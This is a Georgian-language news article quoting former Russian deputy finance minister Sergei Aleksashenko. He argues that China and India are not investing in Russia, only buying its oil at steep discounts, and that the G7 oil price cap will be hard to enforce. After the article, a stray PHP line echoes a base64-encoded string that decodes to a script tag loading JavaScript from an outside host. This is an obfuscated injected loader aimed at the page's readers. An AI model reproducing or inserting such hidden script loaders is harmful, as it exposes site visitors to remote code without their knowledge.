celsiusi
ავერსი საქკაბელი
რუსეთის ფინანსთა მინისტრის ყოფილი მოადგილეს და  რუსეთის ცენტრალური ბანკის თავმჯდომარის ყოფილი პირველი მოადგილეს (1995-1998წწ), სერგეი ალექსაშენკოს განცხადებით, არც ჩინეთი და არც ინდოეთი არ აპირებენ რუსეთში ინვესტირებას, – ამის შესახებ მან რადიო „მაესტროს“ განუცხადა.
 
მისივე თქმით, საუბარი არც არის ისეთ ინვესტიციაზე, რომელიც შეიძლება მნიშვნელოვანი და შესამჩნევი იყოს. მაქსიმუმ, რაზე შეიძლება ჩინელები მზად იყვნენ ეს ის არის, რომ შეისყიდონ წილები გაზის, ნავთობის, ნედლეულის, მეტალურგიის მწარმოებელ კომპანიებში, რომ შემდეგ გაზარდონ ჩნეთში ექსპორტი. 
 
"რასაც აკეთებეს ჩინეთი და ინდოეთი,  შეიძლება დავამატოთ თურქეთიც, ეს ისაა, რომ რუსეთიდან ნედლეულს   დიდი სიამოვნებით  ყიდულობენ ფასდაკლებით. რუსული კომპანიები ევროპაში და ამერიკის შეერთებულ შტატებში ვერ ყიდიან ნავთობს,რითაც  ჩინეთი და ინდოეთი სარგებლობენ და ნავთობს 20-30-40%-იანი ფასდაკლებით ყიდულობენ. ეს არ შეიძლება შეფასდეს, როგორც ინვესტიცია. ამით რუსეთის ეკონომიკა არ ხეირობს. 
 
გარკვეული რუსული კომპანიები ურთულეს მდგომარეობაში მოხვდებიან. კომპანიებისთვის, რომლებიც ევროპაში საკუთარ პროგრამულ უზრუნველყოფას ყიდნენ, მათთვის ეს მიმართულება დაიკეტება. მანამ-სანამ ეს პროგრამისტები არ გადაინაცვლებიან სომხეთში, საქართველოში ან კიდევ სხვაგან და არ დაიწყებენ მუშაობას იქიდან. რაც შეეხება, ნავთობზე "ზღვრული ფასის" შემოღებას, ეს იყო დიდი შვიდეულის მიერ შეთანხმებული საკითხი, მე ამ ზომის მიმართ თავშეკავებულად ვარ განწყობილი, რადგან ვფიქრობ, რომ ტექნიკურად მისი რეალიზება ძალიან რთული იქნება. ვინაიდან, ამ გადაწყვეტილებას არ შეუერთდნენ ძირითადი რუსული ნავთობის შემსყიდველი ჩინეთი და ინდოეთი. მეტიც, მსოფლიოს ვარდისფერი სათვალეებით თუ არ შევხედავთ, ის რომ ჩინეთი და ინდოეთი 30-40%-ნი ფასდაკლებით ყიდულობენ ნავთობს რუსეთიდან, სწორედ ეს არის "ზღვრული ფასი", ის უბრალოდ   მცურავია. მოახდენს თუ არა ეს გავლენას რუსული ნავთობის მოპოვებაზე, ვფიქრობ რომ არა! მთავარი არა მხოლოდ ფულია, საჭიროა კარგად გვესმოდეს, არ აქვს მნიშვნელობა რამდენს მიიღებენ რუსული კომპანიები გაყიდული ნავთობიდან ან მეტალურგიიდან, საბოლოოდ რუსეთის ფინანსთა სამინისტრო ამ თანხას რუბლში მიიღებს. აქ კი გაცვლითი კურსია  მნიშვნელოვანი, თუ რუსული კომპანიები ნაკლებს მიიღებენ დოლარში, ეს დიდწილად იმას ნიშნავს, რომ ფინანსთა სამინისტროს დანაკარგები რუსეთში დოლარის გაძვირებით იქნება კომპენსირებული, რასაც ბევრი მიესალმება. ამიტომ, ეს ზომა ძალიან ლამაზად ჟღერს, მაგრამ, პირველი - როგორც გითხარით, ტექნიკურად რთულად რალიზებადი იქნება, მეორეს კი -  არ ექნება ისეთი დიდი ეფექტი,როგორც წარმოგვიდგენია,"– განაცხადა ალექსაშენკომ.
 
ინტერვიუს სრულად ნახვა შესაძლებელია აქ. 
521
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");